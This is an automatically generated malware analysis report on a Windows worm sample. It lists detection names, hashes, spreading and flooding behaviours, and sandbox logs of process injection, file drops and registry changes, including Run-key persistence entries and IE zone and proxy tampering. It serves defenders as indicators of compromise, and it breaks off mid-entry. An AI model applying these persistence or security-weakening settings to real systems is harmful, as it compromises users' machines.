Trojan.Win32.Yakes.fdil (Kaspersky), Gen:Variant.Graftor.144415 (B) (Emsisoft), Gen:Variant.Graftor.144415 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, Sinowal.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0507408aeba6e089914234e07c5c820d
SHA1: 0176fd0f20f9884bec821083d91698255bae88f4
SHA256: 8ebd76d9305d5c702564a8791b2bdca49706e422d9ee37ae90b105abafee07aa
SSDeep: 1536:QPO20w4Ho0wPZYXpUsg/59Tf2OtavEtAtFFFFFFF5xWWAQ 53E/igGG:wBaUsC59Tf2uavEtAtFFFFFFF5sWDUUr
Size: 97792 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-14 21:16:31
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via an IRC channel. |
MSNWorm | A worm can spread copies of itself through MSN Messenger. |
DNSBlocker | A program can block designated DNS servers, making it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can perform a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can perform a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register a device notification with the help of RegisterDeviceNotification, so it is notified when a USB device is plugged in; the worm then copies itself to the USB device plugged into the affected computer. |
Process activity
The Worm creates the following process(es):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672
The Worm injects its code into the following process(es):
imapi.exe:1264
vmacthlp.exe:920
calc.exe:1160
notepad.exe:1520
svchost.exe:884
jqs.exe:348
winlogon.exe:708
services.exe:752
svchost.exe:948
svchost.exe:1016
svchost.exe:1100
svchost.exe:1148
svchost.exe:1192
spoolsv.exe:1440
Explorer.EXE:1912
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process ngggg.exe:1096 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)
The process calc.exe:1160 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
The process %original file name%.exe:1984 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (0 bytes)
The process vuxrwahifpa.exe:3272 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bpihytyvgix.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vuxrwahifpa.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zthzjntzphj.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)
The process bett.exe:1672 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
The Worm deletes the following file(s):
%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)
Registry activity
The process ngggg.exe:1096 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 2E B1 8F F1 7C 37 B6 2E B7 50 D2 C0 62 93 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process ngggg.exe:1596 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A3 EE 4D 66 CC 58 BD C5 50 33 27 FA EE 17 32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process ngggg.exe:912 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 C7 48 65 58 B0 C5 57 59 1A 61 04 FC 52 10 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process calc.exe:1160 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 4F B3 5E CC 5D CC 76 9D 9B D0 4A D1 09 C3 BA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1160" = "88 00 00 00 EC 09 00 00 8D F1 A2 00 4C 01 02 00"
The process calc.exe:3372 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 03 A1 40 04 7E 4A A4 0F CF 3C 26 4B 13 23 5C"
The process notepad.exe:1520 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F F1 6B CB 5F 10 56 81 D8 22 A9 A1 5B 49 BD 27"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE security zone settings to map all local web-nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process zthzjntzphj.exe:3036 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 76 11 6E F8 B4 CC A0 AF 6F 34 4C D6 18 AE DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process %original file name%.exe:1984 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 54 EE E7 C3 47 FC 22 8A 66 11 F2 AA EF 0F CB"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1984" = "88 00 00 00 B4 04 00 00 8D F1 EB 00 EE 00 0C 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE security zone settings to map all local web-nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dqqq.exe:180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 58 FD 8B E6 27 93 15 0E AF 5A 1D 04 A1 DE A8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"180" = "88 00 00 00 34 0A 00 00 8D F1 98 00 50 01 02 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process vuxrwahifpa.exe:3788 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 AF F4 AB 4E 64 74 6F A3 F4 24 E3 0A 80 F5 77"
The process vuxrwahifpa.exe:3272 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A EE 25 47 2B 02 77 C5 94 CB 87 F3 7D D4 95 C7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process vuxrwahifpa.exe:2984 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 3D 07 01 6E C4 B9 47 8A 60 27 41 B5 E9 78 71"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bpihytyvgix.exe:2996 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 07 71 EC BA 4C 91 51 E6 8F 20 64 C8 FE 80 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process sppp.exe:3284 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 5A 26 2D 8E DE 48 E1 F7 73 DC 8A 73 16 9B 7C"
[HKCU\Software\VRTWatchdog]
"PerfData" = "31 30 30 36 36 34 39 36 33 33 33 35 31 32 35 35"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe"
The process sppp.exe:2528 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA A6 E1 34 34 27 6E C1 04 CD 4A FF 2C 49 B6 BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bett.exe:1580 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 0E 8D 6F 3B 0D 31 A2 E9 96 4D 2E 74 8D 5D 2B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bett.exe:1672 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 7F A2 26 03 06 B3 9E FA 33 39 8E 48 99 35 E2"
[HKCU\Software\Win7zip]
